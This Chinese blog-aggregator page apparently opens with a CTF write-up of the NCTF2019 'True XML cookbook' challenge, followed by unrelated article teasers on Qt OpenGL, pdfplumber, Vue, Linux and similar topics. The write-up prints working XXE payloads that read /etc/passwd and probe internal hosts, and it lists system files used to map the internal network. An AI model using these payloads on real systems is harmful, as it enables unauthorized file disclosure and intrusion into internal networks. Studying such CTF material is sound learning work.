当前位置：首页 > news >正文

[NCTF2019]True XML cookbook --不会编程的崽

news 2025/12/15 23:05:33

题目的提示很明显了，就是xxe攻击，直接抓包。

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<user><username>
&xxe;
</username><password>
1
</password></user>

尝试读取/etc/passwd,应该没过滤什么，也是直接读取。尝试读取一下根目录的flag，但是提示报错了。多半是没有这个文件。然后尝试读取doLogin.php文件，发现账号密码，虽然登录成功但是没什么用。。。又被晃了一下。

xxe漏洞有个点就是可以探针内网，所以首先要知道内网ip。这里可以读取三个文件。

/etc/hosts,/proc/net/arp,/proc/net/fib_trie

我这个读取前两个并未获取有效信息，第三个获得了一个ip地址

10.244.80.143

<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://10.244.80.143" >
]>
<user><username>
&xxe;
</username><password>
1
</password></user>

enmmmmm,还是报错，那这就还有一种可能，flag并不在这一台内网主机上。发送爆破模块，将内网主机一一爆破

因为访问内网要很久而且不在固定主机上，所以，这里也是花了我20分钟才拿到flag。

[NCTF2019]True XML cookbook --不会编程的崽

题目的提示很明显了，就是xxe攻击，直接抓包。 <?xml version "1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <user><username> &xxe; </username><passwor…...

编程日记 2024/2/24 19:53:05

Qt 应用程序中指定使用桌面版本的 OpenGL或嵌入式系统OpenGL ES的 API 进行渲染

qputenv(“QT_OPENGL”, “desktop”) 是用于在 Qt 应用程序中指定使用桌面版本的 OpenGL API 进行渲染。具体来说，qputenv 是 Qt 提供的一个环境变量设置函数，它允许开发者在程序运行时设置环境变量。在这个例子中，环境变量 QT_OPENGL 被设…...

编程日记 2024/2/24 19:52:03

大数据软件，待补充

数据采集： 实时采集： Debezuim Debezuim是构建在 Apach Kafka之上，并提供Kafka连接器来监视特定的数据库管理(采集多种数据库) Canal canal 是阿里开发，用于实时采集Mysql 当中变化的数据 maxwell,flinkX,flinkCDC 离线采集&#…...

编程日记 2024/2/24 19:49:00

深入探索pdfplumber：从PDF中提取信息到实际项目应用【第94篇—pdfplumbe】

深入探索pdfplumber：从PDF中提取信息到实际项目应用在数据处理和信息提取的过程中，PDF文档是一种常见的格式。然而，要从PDF中提取信息并进行进一步的分析，我们需要使用适当的工具。本文将介绍如何使用Python库中的pdfplumber库来…...

编程日记 2024/2/24 19:47:59

实现linux platform tree框架下ICM20608驱动开发（SPI）

目录概述 1 硬件接口 2 添加ICM20608的设备树信息 2.1 使用i.MX Pins Tool v6配置SPI引脚 2.2 配置设备树 2.3 编译.dts 2.4 在板卡中更新设备树 3 编写驱动程序 3.1 创建设备匹配表 3.2 重要函数介绍 3.2.1 初始化函数 3.2.2 写寄存器函数 3.2.3 读寄存器函数 …...

编程日记 2024/2/24 19:46:58

在前端开发中需要考虑的常见web安全问题和攻击原理以及防范措施

文章目录一、XSS攻击1、反射型XSS攻击原理2、DOM型XSS攻击原理3、存储型XSS攻击原理防范措施二、CSRF攻击攻击原理：防范措施： 三、点击劫持攻击原理：防范措施： 四、项目中如何预防安全问题随着互联网的发展，Web应用…...

编程日记 2024/2/24 19:42:55

年关将至送大礼社区适时献爱心

在这个快节奏的时代，社区作为人们生活的重要组成部分，其凝聚力和互助精神显得尤为重要。2024年2月7日，实践队员李若钰有幸参与了社区礼盒分装的活动，这不仅仅是一次简单的劳动，更是一次心灵的洗礼和感悟。礼盒分装&am…...

编程日记 2024/2/24 19:40:53

singularity容器的技术基础

Singularity容器技术是专为科学计算、数据密集型工作和高性能计算（HPC）环境设计的。与其他容器技术如Docker相比，Singularity提供了一些独特的特性和设计考虑，使其在科学和研究社区中受到欢迎。以下是Singularity容器技术的一些关…...

编程日记 2024/2/24 19:39:53

jax可微分编程的笔记（2）

jax可微分编程的笔记（2） 第2章自动微分自动微分和符号求导有诸多的相似之处：它们同样依赖于计算图的构建，同样依赖于求导的递归实现。从某种意义上来说，它们甚至有完全相同的数据结构。不过，二者的区…...

编程日记 2024/2/24 19:38:52

在Linux服务器上部署一个单机项目

目录一、jdk安装二、tomcat安装三、MySQL安装四、部署项目一、jdk安装 1. 上传jdk安装包 jdk-8u151-linux-x64.tar.gz 进入opt目录，将安装包拖进去 2. 解压安装包这里需要解压到usr/local目录下，在这里我新建一个文件夹保存解压后的文件 [r…...

编程日记 2024/2/24 19:36:50

HTTP概要

文章目录什么是HTTP?URL的结构请求报文结构请求方法GETHEADPOSTPUTDELETETRACEOPTIONSCONNECTPATCH解释请求头字段响应报文结构响应状态响应头字段 HTTP会话3次握手无状态协议什么是HTTP? HTTP，即Hypertext Transfer Protocol(超文本传输协议) 它是一个”请…...

编程日记 2024/2/24 19:34:48

128 Linux 系统编程6 ，C++程序在linux 上的调试，GDB调试

今天来整理 GDB 调试。在windows 上我们使用vs2017开发，可以手动的加断点，debug。那么在linux上怎么加断点，debug呢？这就是今天要整理的GDB调试工具了。那么有些同学可能会想到：我们在windows上开发，…...

编程日记 2024/2/24 19:31:45

vue2的ElementUI的form表单报错“Error: [ElementForm]unpected width”修复

1. 问题 ElementUI的form表单，当动态切换显示表单时报错 Error: [ElementForm]unpected width。翻译过来就是form表单的label宽度width出了问题。 2. 分析参数说明类型可选值默认值label-width表单域标签的宽度，例如 ‘50px’。作为 Form 直接子元…...

编程日记 2024/2/24 19:30:44

Linux 网络命令指南

目录配置IP地址和子网掩码网络接口的详细信息测试与目标主机的连通性下载文件或内容远程登录，进行远程管理和协作 CentOS / Red Hat（使用 firewalld） 关闭防火墙开启防火墙配置TCP端口（假设使用3306端口&#xff…...

编程日记 2024/2/24 19:28:42

vue3组件间的通信，通过props，emit，provide和inject把数据传递N个层级，expose和ref实现父组件调用子组件方法

文章目录一、父组件数据传递N个层级的子组件vue3 provide 与 injectA组件名称 app.vueB组件名称 provideB.vueC组件名称 provideCSetup.vue 二、使用v-model指令实现父子组件的双向绑定父组件名称 app.vue子组件名称 v-modelSetup.vue 三、父组件props向子组件传值子组件 prop…...

编程日记 2024/2/24 19:26:40

开源免费的NTFS for mac工具mounty

开源免费的NTFS for mac工具mounty 安装依赖 brew install gromgit/fuse/ntfs-3g-macbrew install --cask macfuse安装mounty 如果已经安装macFUSE和ntfs-3g-mac，可以直接点击下载的dmg安装包，安装升级。第一次启动mounty，你需要接受一系列…...

编程日记 2024/2/24 19:24:38

Sora-OpenAI 的 Text-to-Video 模型：制作逼真的 60s 视频片段

OpenAI 推出的人工智能功能曾经只存在于科幻小说中。 2022年，Openai 发布了 ChatGPT，展示了先进的语言模型如何实现自然对话。随后，DALL-E 问世，它利用文字提示生成令人惊叹的合成图像。现在，他们又推出了 Text-t…...

编程日记 2024/2/24 19:23:37

[CISCN 2019 初赛]Love Math1 打开题目题目源码 <?php error_reporting(0); //听说你很喜欢数学，不知道你是否爱它胜过爱flag if(!isset($_GET[c])){show_source(__FILE__); }else{//例子 c20-1$content $_GET[c];if (strlen($content) > 80) {die("…...

编程日记 2024/2/24 19:21:35

Jmeter基础(3) 发起一次请求

目录 Jmeter 一次请求添加线程组添加HTTP请求添加监听器 Jmeter 一次请求用Jmeter进行一次请求的过程，需要几个步骤呢？ 1、添加线程组2、添加HTTP请求3、添加监听器，查看结果树现在就打开jmeter看下如何创建一个请求吧添加线程组用来…...

编程日记 2024/2/24 19:20:34

视频怎么变成gif动图？一招教你在线转换

MP4是一种常见的视频文件格式，它可以包含音频和视频数据，并支持高质量的视频压缩。MP4视频可以呈现连续的动态效果，可以包含平滑的运动、音频等多媒体元素。而GIF动图是由一系列静态图像组成的，通过快速连续播放这些帧来创造出动态…...

编程日记 2024/2/24 19:19:33

vscode里如何用git

打开vs终端执行如下： 1 初始化 Git 仓库（如果尚未初始化） git init 2 添加文件到 Git 仓库 git add . 3 使用 git commit 命令来提交你的更改。确保在提交时加上一个有用的消息。 git commit -m "备注信息" 4 …...

编程新知 2025/8/24 20:45:38

Lombok 的 @Data 注解失效，未生成 getter/setter 方法引发的HTTP 406 错误

HTTP 状态码 406 (Not Acceptable) 和 500 (Internal Server Error) 是两类完全不同的错误，它们的含义、原因和解决方法都有显著区别。以下是详细对比： 1. HTTP 406 (Not Acceptable) 含义： 客户端请求的内容类型与服务器支持的内容类型不匹…...

编程新知 2025/12/10 15:33:21

Prompt Tuning、P-Tuning、Prefix Tuning的区别

一、Prompt Tuning、P-Tuning、Prefix Tuning的区别 1. Prompt Tuning（提示调优）核心思想：固定预训练模型参数，仅学习额外的连续提示向量（通常是嵌入层的一部分）。实现方式：在输入文本前添加可训练的连续向量（软提示），模型只更新这些提示参数。优势：参数量少（仅提…...

编程新知 2025/12/15 19:22:53

DeepSeek 赋能智慧能源：微电网优化调度的智能革新路径

目录一、智慧能源微电网优化调度概述1.1 智慧能源微电网概念1.2 优化调度的重要性1.3 目前面临的挑战二、DeepSeek 技术探秘2.1 DeepSeek 技术原理2.2 DeepSeek 独特优势2.3 DeepSeek 在 AI 领域地位三、DeepSeek 在微电网优化调度中的应用剖析3.1 数据处理与分析3.2 预测与…...

编程新知 2025/11/20 2:48:44